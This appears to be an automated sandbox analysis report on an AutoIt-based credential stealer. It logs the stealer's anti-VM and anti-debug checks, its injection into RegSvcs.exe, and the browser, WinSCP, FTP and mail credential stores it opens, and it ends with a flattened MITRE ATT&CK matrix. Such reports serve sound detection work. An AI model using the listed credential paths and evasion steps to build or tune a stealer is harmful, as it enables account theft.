Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,5_2_0040E500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99889Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99756Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99637Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99529Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99371Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99250Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99016Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98875Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98657Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98532Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98407Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98297Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98188Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98078Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97938Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97828Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97719Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97579Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97454Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97330Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97219Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97108Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99671Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99562Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99343Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99124Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99015Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98906Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98796Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98687Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98578Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98468Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98359Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98249Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98140Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98029Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97921Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97812Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97703Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97484Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97374Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97265Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97156Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97046Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96937Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000004.00000002.1842770518.0000022CB5D54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: incalculability.exe, 00000005.00000002.1899521936.00000000008E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAPI call chain: ExitProcess graph end nodegraph_5-84845
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045A370 BlockInput,5_2_0045A370
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D590
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F276F0 mov eax, dword ptr fs:[00000030h]5_2_03F276F0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F28DD0 mov eax, dword ptr fs:[00000030h]5_2_03F28DD0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F28D70 mov eax, dword ptr fs:[00000030h]5_2_03F28D70
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_004238DA
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041F250 SetUnhandledExceptionFilter,5_2_0041F250
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041A208
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EAF008Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CDE008Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00436CD7 LogonUserW,5_2_00436CD7
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D590
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_0043333C
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\q6utlq83i0.exe"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00446124
Source: incalculability.exeBinary or memory string: Shell_TrayWnd
Source: q6utlq83i0.exe, incalculability.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,5_2_004720DB
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00472C3F GetUserNameW,5_2_00472C3F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_0041E364
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,5_2_0040E500
Source: C:\Users\user\Desktop\q6utlq83i0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: incalculability.exeBinary or memory string: WIN_XP
Source: incalculability.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: incalculability.exeBinary or memory string: WIN_XPe
Source: incalculability.exeBinary or memory string: WIN_VISTA
Source: incalculability.exeBinary or memory string: WIN_7
Source: incalculability.exeBinary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,5_2_004652BE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00476619
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0046CEF3

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting		2
Valid Accounts		121
Windows Management Instrumentation		111
Scripting		1
Exploitation for Privilege Escalation		11
Disable or Modify Tools		2
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		21
Input Capture		1
Account Discovery		Remote Desktop Protocol2
Data from Local System		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		1
Credentials in Registry		2
File and Directory Discovery		SMB/Windows Admin Shares1
Email Collection		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS128
System Information Discovery		Distributed Component Object Model21
Input Capture		2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
Process Injection		1
Masquerading		LSA Secrets331
Security Software Discovery		SSH3
Clipboard Data		23
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials121
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
Virtualization/Sandbox Evasion		DCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
